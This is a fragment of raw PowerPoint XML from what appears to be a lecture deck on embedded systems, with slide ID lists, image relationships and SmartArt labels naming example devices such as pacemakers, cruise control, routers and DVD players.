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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="287" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="269" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="283" r:id="rId17"/>
    <p:sldId id="678" r:id="rId18"/>
    <p:sldId id="285" r:id="rId19"/>
    <p:sldId id="286"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460"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46" r:id="rId70"/>
    <p:sldId id="337" r:id="rId71"/>
    <p:sldId id="338" r:id="rId72"/>
    <p:sldId id="339" r:id="rId73"/>
    <p:sldId id="340" r:id="rId74"/>
    <p:sldId id="341" r:id="rId75"/>
    <p:sldId id="342" r:id="rId76"/>
    <p:sldId id="343" r:id="rId77"/>
    <p:sldId id="344" r:id="rId78"/>
    <p:sldId id="345"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3" r:id="rId134"/>
    <p:sldId id="404"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6" r:id="rId156"/>
    <p:sldId id="427" r:id="rId157"/>
    <p:sldId id="428" r:id="rId158"/>
    <p:sldId id="429" r:id="rId159"/>
    <p:sldId id="430" r:id="rId160"/>
    <p:sldId id="431" r:id="rId161"/>
    <p:sldId id="432" r:id="rId162"/>
    <p:sldId id="433" r:id="rId163"/>
    <p:sldId id="434" r:id="rId164"/>
    <p:sldId id="435" r:id="rId165"/>
    <p:sldId id="436" r:id="rId166"/>
    <p:sldId id="437"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0" r:id="rId180"/>
    <p:sldId id="451" r:id="rId181"/>
    <p:sldId id="452" r:id="rId182"/>
    <p:sldId id="453" r:id="rId183"/>
    <p:sldId id="454" r:id="rId184"/>
    <p:sldId id="455" r:id="rId185"/>
    <p:sldId id="456" r:id="rId186"/>
    <p:sldId id="457" r:id="rId187"/>
    <p:sldId id="458" r:id="rId188"/>
    <p:sldId id="459" r:id="rId189"/>
    <p:sldId id="461" r:id="rId190"/>
    <p:sldId id="744" r:id="rId191"/>
    <p:sldId id="745" r:id="rId192"/>
    <p:sldId id="746" r:id="rId193"/>
    <p:sldId id="747" r:id="rId194"/>
    <p:sldId id="748" r:id="rId195"/>
    <p:sldId id="749" r:id="rId196"/>
    <p:sldId id="750" r:id="rId197"/>
    <p:sldId id="751" r:id="rId198"/>
    <p:sldId id="752" r:id="rId199"/>
    <p:sldId id="753" r:id="rId200"/>
    <p:sldId id="754" r:id="rId201"/>
    <p:sldId id="755" r:id="rId202"/>
    <p:sldId id="756" r:id="rId203"/>
    <p:sldId id="757" r:id="rId204"/>
    <p:sldId id="758" r:id="rId205"/>
    <p:sldId id="759" r:id="rId206"/>
    <p:sldId id="760" r:id="rId207"/>
    <p:sldId id="761" r:id="rId208"/>
    <p:sldId id="762" r:id="rId209"/>
    <p:sldId id="763" r:id="rId210"/>
    <p:sldId id="764" r:id="rId211"/>
    <p:sldId id="765" r:id="rId212"/>
    <p:sldId id="766" r:id="rId213"/>
    <p:sldId id="767" r:id="rId214"/>
    <p:sldId id="768" r:id="rId215"/>
    <p:sldId id="769" r:id="rId216"/>
    <p:sldId id="770" r:id="rId217"/>
    <p:sldId id="771" r:id="rId218"/>
    <p:sldId id="772" r:id="rId219"/>
    <p:sldId id="773" r:id="rId220"/>
    <p:sldId id="774" r:id="rId221"/>
    <p:sldId id="816" r:id="rId222"/>
    <p:sldId id="775" r:id="rId223"/>
    <p:sldId id="776" r:id="rId224"/>
    <p:sldId id="777" r:id="rId225"/>
    <p:sldId id="778" r:id="rId226"/>
    <p:sldId id="779" r:id="rId227"/>
    <p:sldId id="780" r:id="rId228"/>
    <p:sldId id="781" r:id="rId229"/>
    <p:sldId id="782" r:id="rId230"/>
    <p:sldId id="783" r:id="rId231"/>
    <p:sldId id="784" r:id="rId232"/>
    <p:sldId id="785" r:id="rId233"/>
    <p:sldId id="786" r:id="rId234"/>
    <p:sldId id="787" r:id="rId235"/>
    <p:sldId id="788" r:id="rId236"/>
    <p:sldId id="789" r:id="rId237"/>
    <p:sldId id="790" r:id="rId238"/>
    <p:sldId id="791" r:id="rId239"/>
    <p:sldId id="792" r:id="rId240"/>
    <p:sldId id="561" r:id="rId241"/>
    <p:sldId id="562" r:id="rId242"/>
    <p:sldId id="563" r:id="rId243"/>
    <p:sldId id="564" r:id="rId244"/>
    <p:sldId id="565" r:id="rId245"/>
    <p:sldId id="566" r:id="rId246"/>
    <p:sldId id="567" r:id="rId247"/>
    <p:sldId id="568" r:id="rId248"/>
    <p:sldId id="569" r:id="rId249"/>
    <p:sldId id="570" r:id="rId250"/>
    <p:sldId id="602" r:id="rId251"/>
    <p:sldId id="603" r:id="rId252"/>
    <p:sldId id="604" r:id="rId253"/>
    <p:sldId id="605" r:id="rId254"/>
    <p:sldId id="606" r:id="rId255"/>
    <p:sldId id="607" r:id="rId256"/>
    <p:sldId id="608" r:id="rId257"/>
    <p:sldId id="609" r:id="rId258"/>
    <p:sldId id="610" r:id="rId259"/>
    <p:sldId id="611" r:id="rId260"/>
    <p:sldId id="612" r:id="rId261"/>
    <p:sldId id="613" r:id="rId262"/>
    <p:sldId id="614" r:id="rId263"/>
    <p:sldId id="615" r:id="rId264"/>
    <p:sldId id="616" r:id="rId265"/>
    <p:sldId id="617" r:id="rId266"/>
    <p:sldId id="618" r:id="rId267"/>
    <p:sldId id="619" r:id="rId268"/>
    <p:sldId id="620" r:id="rId269"/>
    <p:sldId id="621" r:id="rId270"/>
    <p:sldId id="622" r:id="rId271"/>
    <p:sldId id="623" r:id="rId272"/>
    <p:sldId id="571" r:id="rId273"/>
    <p:sldId id="572" r:id="rId274"/>
    <p:sldId id="573" r:id="rId275"/>
    <p:sldId id="624" r:id="rId276"/>
    <p:sldId id="626" r:id="rId277"/>
    <p:sldId id="574" r:id="rId278"/>
    <p:sldId id="575" r:id="rId279"/>
    <p:sldId id="576" r:id="rId280"/>
    <p:sldId id="577" r:id="rId281"/>
    <p:sldId id="796" r:id="rId282"/>
    <p:sldId id="797" r:id="rId283"/>
    <p:sldId id="798" r:id="rId284"/>
    <p:sldId id="799" r:id="rId285"/>
    <p:sldId id="800" r:id="rId286"/>
    <p:sldId id="801" r:id="rId287"/>
    <p:sldId id="802" r:id="rId288"/>
    <p:sldId id="803" r:id="rId289"/>
    <p:sldId id="804" r:id="rId290"/>
    <p:sldId id="805" r:id="rId291"/>
    <p:sldId id="806" r:id="rId292"/>
    <p:sldId id="807" r:id="rId293"/>
    <p:sldId id="808" r:id="rId294"/>
    <p:sldId id="809" r:id="rId295"/>
    <p:sldId id="810" r:id="rId296"/>
    <p:sldId id="811" r:id="rId297"/>
    <p:sldId id="812" r:id="rId298"/>
    <p:sldId id="813" r:id="rId299"/>
    <p:sldId id="814" r:id="rId300"/>
    <p:sldId id="815" r:id="rId301"/>
    <p:sldId id="628" r:id="rId302"/>
    <p:sldId id="793" r:id="rId303"/>
    <p:sldId id="794" r:id="rId304"/>
    <p:sldId id="795" r:id="rId305"/>
    <p:sldId id="630" r:id="rId306"/>
    <p:sldId id="629" r:id="rId307"/>
    <p:sldId id="631" r:id="rId308"/>
    <p:sldId id="632" r:id="rId309"/>
    <p:sldId id="633" r:id="rId310"/>
    <p:sldId id="634" r:id="rId311"/>
    <p:sldId id="635" r:id="rId312"/>
    <p:sldId id="636" r:id="rId313"/>
    <p:sldId id="637" r:id="rId314"/>
    <p:sldId id="638" r:id="rId315"/>
    <p:sldId id="639" r:id="rId316"/>
    <p:sldId id="640" r:id="rId317"/>
    <p:sldId id="641" r:id="rId318"/>
    <p:sldId id="642" r:id="rId319"/>
    <p:sldId id="643" r:id="rId320"/>
    <p:sldId id="644" r:id="rId321"/>
    <p:sldId id="645" r:id="rId322"/>
    <p:sldId id="646" r:id="rId323"/>
    <p:sldId id="647" r:id="rId324"/>
    <p:sldId id="648" r:id="rId325"/>
    <p:sldId id="649" r:id="rId326"/>
    <p:sldId id="650" r:id="rId327"/>
    <p:sldId id="651" r:id="rId328"/>
    <p:sldId id="652" r:id="rId329"/>
    <p:sldId id="653" r:id="rId330"/>
    <p:sldId id="654" r:id="rId331"/>
    <p:sldId id="655" r:id="rId332"/>
    <p:sldId id="656" r:id="rId333"/>
    <p:sldId id="657" r:id="rId334"/>
    <p:sldId id="658" r:id="rId335"/>
    <p:sldId id="659" r:id="rId336"/>
    <p:sldId id="660" r:id="rId337"/>
    <p:sldId id="661" r:id="rId338"/>
    <p:sldId id="662" r:id="rId339"/>
    <p:sldId id="663" r:id="rId340"/>
    <p:sldId id="664" r:id="rId341"/>
    <p:sldId id="665" r:id="rId342"/>
    <p:sldId id="666" r:id="rId343"/>
    <p:sldId id="667" r:id="rId344"/>
    <p:sldId id="668" r:id="rId345"/>
    <p:sldId id="669" r:id="rId346"/>
    <p:sldId id="670" r:id="rId347"/>
    <p:sldId id="671" r:id="rId348"/>
    <p:sldId id="672" r:id="rId349"/>
    <p:sldId id="673" r:id="rId350"/>
    <p:sldId id="674" r:id="rId351"/>
    <p:sldId id="675" r:id="rId352"/>
    <p:sldId id="676" r:id="rId353"/>
    <p:sldId id="677" r:id="rId3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1" autoAdjust="0"/>
    <p:restoredTop sz="78219" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="-1339"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theme" Target="theme/theme1.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_rels/data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gif"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpe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wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.wmf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.pn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gif"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpe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wmf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.wmf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.pn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C5912-42CD-4625-9755-D3B8FD635E22}"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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C043118-3FFC-4561-ABDB-394C2E6D2EE1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>MRI Scanner</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{592A27B8-87DD-462B-AE16-B9607F92BD08}" type="parTrans" cxnId="{ED6D8298-FD0F-41ED-85DF-6A61065730C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E42098A2-EADA-4E78-929E-DC0C8CE0757F}" type="sibTrans" cxnId="{ED6D8298-FD0F-41ED-85DF-6A61065730C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0899F5CA-668C-44CC-9ED2-0612BBC18D2D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Hearing Aid</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8045BA95-8E1B-4825-A82F-212B5DC784FC}" type="parTrans" cxnId="{6DA1709B-9E89-475D-92B2-C8A5E03D1D15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98AE27B2-1399-482C-AA42-384B5CB37CD1}" type="sibTrans" cxnId="{6DA1709B-9E89-475D-92B2-C8A5E03D1D15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9275E04B-F0EC-4EC9-9417-C462CC072C77}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Pace Maker</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{273180A4-0B81-4EE7-9CA7-04829DFD52A4}" type="parTrans" cxnId="{3CC51001-B940-4E6C-B814-8F9A65BA887F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A022C8A3-3CCF-4507-9EE2-CE4C920B434A}" type="sibTrans" cxnId="{3CC51001-B940-4E6C-B814-8F9A65BA887F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DECE47F-1B2B-4B7B-B891-316C50DC087F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Traffic Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D3D5F7F-FA1D-4917-8EAC-71F5028AE911}" type="parTrans" cxnId="{1BF4D666-0A25-44FE-A144-D6B5A7429C5D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90187010-5C55-4B67-B80D-C519D715BF8D}" type="sibTrans" cxnId="{1BF4D666-0A25-44FE-A144-D6B5A7429C5D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A1B9150-FB99-4D58-9C04-298871F8F847}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Congestion Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E80AB93E-F4BA-4666-8233-282B3100712D}" type="parTrans" cxnId="{6491CEE5-4D45-423D-B129-D5D2E506F5CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E869DAF-8703-4C25-94D3-0930A9794A7E}" type="sibTrans" cxnId="{6491CEE5-4D45-423D-B129-D5D2E506F5CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D571FBA1-C111-487D-A1CC-3ABA9B62D5B9}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Mirror Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11B76928-6875-4337-97A7-644BD4B247AF}" type="parTrans" cxnId="{D6761204-EC99-4F6F-9D9E-4A2A43353B6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58D488A8-CFCF-4486-BDF8-D94A8FD936D5}" type="sibTrans" cxnId="{D6761204-EC99-4F6F-9D9E-4A2A43353B6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A699AA5-3DA2-4A80-AA12-ADD62C4F8C36}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Cruise Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69920461-8E1E-4A21-A9EE-E45363EE479D}" type="parTrans" cxnId="{943E2C16-CD56-4222-B0F2-9D2D084118D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA02151B-CCF0-4D5A-8CED-76CEC1D064DB}" type="sibTrans" cxnId="{943E2C16-CD56-4222-B0F2-9D2D084118D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60AB827D-5295-4177-BF64-99000A240B5F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Headlight Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4823A2E2-B52B-4D74-8692-46899E042B65}" type="parTrans" cxnId="{4D39CDF2-BB8E-4A52-A9EE-9A1148A6879D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36F281B0-F791-4991-8164-D7924CBABE59}" type="sibTrans" cxnId="{4D39CDF2-BB8E-4A52-A9EE-9A1148A6879D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FA5E191-71CB-4DA0-828B-EE161F632C3B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Anti-Brake System</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F06C3E3-9CF0-4AAB-A4E1-52603372F143}" type="parTrans" cxnId="{CC2A6357-A96B-4E1D-AE3D-E61D95E1AAE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{872D6295-D746-4DBA-BB2B-E37798932101}" type="sibTrans" cxnId="{CC2A6357-A96B-4E1D-AE3D-E61D95E1AAE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9584D754-28D6-4FDA-ADF3-CA332D8340FB}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Wireless Router</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D7BD32B-3E1E-49A8-9D2E-28EAFE5E3CDB}" type="parTrans" cxnId="{F959FAE0-94D9-4CBA-B33F-178D36746DAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4BF8CBA-1A3F-41B3-9E8D-0AFD5F2FEAB1}" type="sibTrans" cxnId="{F959FAE0-94D9-4CBA-B33F-178D36746DAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6562DFE-B211-4253-BE95-BF2E3337D88D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Network Switch</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{875EB06B-C874-4B79-91C9-5269A753B733}" type="parTrans" cxnId="{7C4A0190-5F4F-4C6D-840C-D30A4E44C08F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9BC2EA4-0955-47D8-856E-5D8C95308B86}" type="sibTrans" cxnId="{7C4A0190-5F4F-4C6D-840C-D30A4E44C08F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7B236BC-B794-4D90-A882-86A8AF33D287}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Printer/Copier</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50DCA0B2-5E88-4C7B-9B24-C2B9A9EF5AE0}" type="parTrans" cxnId="{6BE3CF21-2538-448B-9010-7677CC715298}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FAB8FA6-E25B-45F1-B354-12F076C389A0}" type="sibTrans" cxnId="{6BE3CF21-2538-448B-9010-7677CC715298}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01047C79-1121-489F-A746-5B7F85773AF5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Graphics / Network Card</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5E9C87B-BAEB-410D-8198-5A7EC1AC93BB}" type="parTrans" cxnId="{4F475FC1-6162-4011-8ED4-D6E5AB37FEF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CDF00D0-69B0-475F-AA94-23D6D76155AA}" type="sibTrans" cxnId="{4F475FC1-6162-4011-8ED4-D6E5AB37FEF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{401508D2-1EEC-4854-AFE4-45F7FFD9B5E2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Telephone Set</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EC291F3-4AE7-4BAF-BC6A-4C12272BD5E0}" type="parTrans" cxnId="{D4DDC44D-F78B-469A-9921-4D79CA47E46C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C378B84-21E4-405A-80F8-A7AAA86F5C54}" type="sibTrans" cxnId="{D4DDC44D-F78B-469A-9921-4D79CA47E46C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8676357-B10F-4249-BAB2-D2A4DA079CDA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>DVD Player</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3778B750-BEEF-4862-8EE9-3B7DF9401DF4}" type="parTrans" cxnId="{4D05FF0E-E3B1-444E-A32A-B6057443940B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9945E62-5663-4796-9279-1B5E505C63E3}" type="sibTrans" cxnId="{4D05FF0E-E3B1-444E-A32A-B6057443940B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6F41214-1A9C-41F0-AEE0-40DA156E0BD7}">
